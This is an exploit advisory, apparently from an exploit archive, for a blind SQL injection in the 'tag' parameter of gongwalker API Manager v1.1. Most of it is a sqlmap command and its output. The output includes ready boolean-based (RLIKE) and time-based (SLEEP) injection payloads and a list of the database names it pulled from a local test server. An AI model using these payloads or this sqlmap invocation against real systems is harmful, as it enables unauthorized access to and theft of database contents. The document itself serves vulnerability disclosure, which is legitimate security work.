Gongwalker API Manager 1.1 Blind SQL Injection

`gongwalker API Manager v1.1 - Blind SQL Injection  
  
# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection  
# Date: 2016-01-25  
# Exploit Author: HaHwul  
# Exploit Author Blog: www.hahwul.com  
# Vendor Homepage: https://github.com/gongwalker/ApiManager  
# Software Link: https://github.com/gongwalker/ApiManager.git  
# Version: v1.1  
# Tested on: Debian  
  
# =================== Vulnerability Description =================== #  
Api Manager's index.php used tag parameters is vulnerable  
http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1  
  
# ========================= SqlMap Query ========================== #  
sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag  
  
# ================= SqlMap Result(get My Test DB) ================= #  
Parameter: tag (GET)  
Type: boolean-based blind  
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)  
Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind (SELECT)  
Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF  
---  
[21:14:21] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.10  
back-end DBMS: MySQL 5.0.11  
[21:14:21] [INFO] fetching database names  
[21:14:21] [INFO] fetching number of databases  
[21:14:21] [INFO] resumed: 25  
[21:14:21] [INFO] resumed: information_schema  
[21:14:21] [INFO] resumed: "  
[21:14:21] [INFO] resumed: ""  
[21:14:21] [INFO] resumed: '  
[21:14:21] [INFO] resumed: ''  
[21:14:21] [INFO] resumed: '''  
[21:14:21] [INFO] resumed: api  
[21:14:21] [INFO] resumed: blackcat  
[21:14:21] [INFO] resumed: edusec  
  
...  
  
  
`